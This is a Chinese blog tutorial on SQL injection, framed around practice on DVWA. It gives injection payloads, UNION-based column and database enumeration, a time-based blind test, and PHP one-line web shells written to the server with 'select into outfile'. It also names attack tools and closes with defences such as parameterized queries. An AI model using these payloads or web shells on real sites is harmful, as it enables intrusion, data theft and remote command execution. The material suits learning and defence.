关于SQL inject (SQL注入漏洞的学习)

最新推荐文章于 2024-02-28 14:57:47 发布
最新推荐文章于 2024-02-28 14:57:47 发布
阅读量2.8k 收藏 5
点赞数
分类专栏: 漏洞学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23328913/article/details/80372471
版权

何为SQL注入漏洞? 顾名思义是利用开发人员对用户提交的参数没有进行严格的过滤而导致用户可通过构造特殊的参数拼接SQL语句而执行意外的操作

那我们如何通过练习来了解这个漏洞呢?这里推荐DVWA这个练习系统 里面集成了一些常见的WEB漏洞 来供我们自行搭建环境练习

举个例子  比如网站有个查询用户的功能, 其查询语句如下 :select name from users where name=$name

那么用户就可以通过 构造参数 1 or 1=1 来实现爆出所有用户  其最终查询语句如下 select name from users where name=1 or 1=1

因为1=1永远为真 所有实现了查询所有用户

你可能会问 万一SQL语句是这样子的呢? select name from users where name='$name'

这种形式的查询语句我们也是有办法进行注入的,我们可以人为构造单引号的闭合,并利用注释符号去除多余的内容 好吧 这样说可能不明白 那我们再来个例子

例如 用户构造参数 1' or 1=1# ,其最终执行SQL为 :select name from users where name='1' or 1=1#'

我们可以发现 原来的右边的单引号被我们用注释干掉了 ,并且我们人为制造了一个新的单引号来闭合 从而构造出了正确的SQL语句  同样也可以实现

好了 下面来讲解SQL注入的一般步骤

1.寻找SQL注入点

如何寻找SQL注入点呢?既然是SQL注入,那么一切与数据库有关的查询都可以成为我们的对象,但如何知道这个点是否能够注入呢? 重点就是看看我们构造的意外的SQL语句能否被系统所执行, 我们可以提交一个单引号' 如何被执行了,那么会因为单引号而引起SQL的语法错误 网页就会报错

当然这个操作也可以由软件来完成 这里只谈手工完成

2.执行注入操作

    首先,如果你是想获取数据库的内容,那你就需要猜测出数据库的表名 还有列名 通过union来与原先的查询合并,使得页面爆出我们想要的内容  可通过and 1=2 来取消前面一条select语句的结果 但是使用UNION需要注意的是,合并的select查询的字段必须跟原先查询的字段数一致,才能进行union,那么问题来了,我们如何知道原先select语句所查询的字段有多少呢?我们可以通过 order by x语句来测试列数 order by 1代表按第一列排序 如果X不存在 则会报错 所以我们可以通过这样子来猜测列数

如果我们需要知道数据库的名称,版本,于是就有两列,但是比原先select的列数少怎么办呢? 我们可以用数字来代替 比如假设原先有3个列数,我们现在用union 联合原先的 则union的select 1,version(),database()  这样就构造了有3列的联合查询 

 那如果我们想要拿到后台的shell呢? 此时就需要我们听起来很牛逼的一句话木马结合sql语句的 select into outfile来实现了

下面给出PHP版本的一句话木马

一句话木马PHP版
<? system($_REQUEST['cmd'])?>

<?php eval('$_POST['888']')?>

那么我们如何把上面给的一句话木马上传到目标站点呢?可通过构造如下SQL语句: 

select "<?system($_REQUEST['cmd'])?>" into outfile "路径"

但是问题又来了 我们并不知道网站的路径结构,那么我们如何构造这个SQL语句呢?其实路径我们是有办法知道的,通过猜测,或则利用报错来使得网站爆出它的路径 

关于暴路径 可以参考这篇文章 https://www.cnblogs.com/cookies9/p/3395010.html

上传成功后,我们就可以访问我们的一句话木马文件,通过GET请求发送命令等


接下来介绍SQL inject (blind) 这个也是SQL注入,不同的是开发者关闭了错误回显,这就使得我们不可能通过报错信息来获得种种信息,例如判断是否为SQL注入点 此时单引号法就失效了,那我们可以利用这样的语句 and sleep(3)这个语句来测试,如果我们提交的查询真的经过了3秒后才执行返回结果,那么就证明系统执行了我们构造的SQL语句 


下面列出一些自动化工具

1.菜刀 用来管理一句话木马,使得我们的操作变得简便,当我们把木马文件上传成功后,就可以通过菜刀来轻松的使用木马文件

2.burpsuite  这个软件可以用来暴力破解表名列名 原理是通过模仿请求 然后通过判断请求返回的内容来判断是否是存在的字段或表名 但是判断规则需要我们自己设置 他也可以实现重放功能,使得已发送的数据包能够再次发送,方便我们测试

3.sqlmap 可谓神器,集暴力破解等功能于一身,这里不作介绍,有兴趣者自行百度使用

防范措施

1.不信任用户的任何输入,对用户的输入严格过滤 

2.使用参数化的SQL语句 (推荐!)

3.数据库分用户,严格限制权限

无可再忍
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
zhuru.rar_SQL inject_asp注入_sql 注入_sql注入_zhuru sql
09-14
sql注入测试程序,asp+access注入测试小程序
Sql Inject-SQL注入
田田云逸的博客
04-28 338
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。哦,SQL注入漏洞,可怕的漏洞
MybatisPlus是否防止SQL注入
wgx_0504的博客
05-06 3718
如果我希望使用mybatisplus同时也进行防SQL注入操作,应该怎么处理?
sql注入漏洞详解
最新发布
qq_73792226的博客
02-28 853
1.原理:当我们访问动态网站时,web服务器会向数据访问层发起sql查询请求,如果权限验证通过就会执行sql语句(这种网站内部发起的sql语句一版没有危险,但很多情况下要结合用户输入数据动态构造sql语句,如果用户输入恶意的sql代码,web又不对动态数据进行审查,则会有意想不到的危险)联合注入,布尔盲注,报错注入,延时盲注,宽字节与二次注入,Cookie注入,http header注入(各种类型不做详解,后续可能会做)select * from where id = x and 1 = 1;
sql注入详解
xupt_rl的博客
07-20 268
sql注入   所谓sql注入就是,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器的恶意SQL命令。当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击。如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的字符串来传递,也会发生sql注入。 案列 ...
SQL注入SQL Injection)
乐亦亦乐的博客
02-02 984
SQL注入的定义: 所谓SQL注入,就是利用现有应用程序的特性,攻击者通过在web表单、URL等可输入数据的地方插入(恶意)SQL语句一并原有SQL语句被代库执行。SQL命令就是前端应用程序和后端数据库之间的接口。 SQL注入的危害: 数据库敏感信息泄露 网页被篡改,挂马 数据库被恶意操作 服务器被远程控制,被安装后门 …… SQL注入常见分类: 按数据类型:数字型(Integer...
SQL Inject 测试
辉小鱼的博客
09-10 287
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。
WebCruiserEnt.zip_SQL inject_scan
09-24
sql inject scan for windows
sqlinjectsql注入资料
09-12
Web Application Security: A Survey of Prevention Techniques Against SQL Injection1 web安全,sql 注入方面的资料文档,E文。
php防止sql注入代码实例
12-18
放到公用调用文件(如conn数据库链接文件),对所有GET或POST的数据进行过滤特殊字符串,以实现简单有效的SQL注入过滤 复制代码 代码如下:Function inject_check($sql_str) { return eregi(‘select|insert|and|or|...
通达OA v11.5 swfupload_new.php SQL注入漏洞.md
09-07
通达OA漏洞合集
SqlInject1[1].01
10-05
经常碰到这样的注入环境,但有的时候网上给的工具并不能完全应付所有的环境。比如有的会有过滤啊啥的,为了方便我特意写了这个工具。基本上可以应付所有的php+mysql...
Pikachu靶场通关笔记--Sql Inject(SQL注入)
weixin_45908624的博客
12-09 2553
sql注入
SQL注入详解
热门推荐
qq_48904485的博客
03-21 1万+
针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序意料之外结果的攻击行为。 其成因可归结为以下两个原理叠加造成: 1、程序编写者在处理程序和数据库交互时,使用字符串凭借的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 SQL注入的攻击方式分为:报错注入、布尔盲注 、延时注入、堆叠查询、联合查询 、二次注入等等
白话sql注入sql Injection)系统总结
weixin_54603520的博客
03-23 900
数据库就是一个存储数据的仓库,数据库是以一定方式存储在一起,能与多个用户共享,具有尽可能小的冗余,与应用程序彼此独立的数据集合。mysql中存在4个控制权限的表,分别为user表,db表,tables_priv表,columns_priv表,mysql权限表的验证过程为:先从user表中的Host,User,Password这3个字段中判断连接的ip、用户名、密码是否存在,存在则通过验证。通过身份认证后,进行权限分配,
SQL Inject
辉小鱼的博客
09-09 515
SQL Inject 发生于应用程序与数据库层的安全漏洞,网站内部直接发送的SQL请求一般不会有危险,但实际情况是很多时候需要结合用户的输入数据动态构造SQL语句, 如果用户输入的数据被构造成恶意SQL代码,web应用又未对动态构造的SQL语句使用的参数进行审查,则会带来影响不到的危险。
java sqlutils_sqlUtils.java
weixin_42503008的博客
02-16 409
importjava.sql.SQLException;importjava.util.Enumeration;importjava.util.HashMap;importjava.util.Map;importjava.util.Random;importjava.util.UUID;importjava.util.regex.Matcher;importjava.util.regex.Patt...
SQL注入Injection)简介
cnds123的专栏
11-25 6364
SQL注入Injection)简介 SQL注入SQL injection),是发生于应用程序与数据库层的安全漏洞。只要是支持处理SQL指令的数据库服务器,都有可能受到此种手法的攻击。 是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。 SQL注入演示 SQL命令
SQL注入SQL injection)
l_010的博客
06-21 507
SQL注入SQL injection)
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场的sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值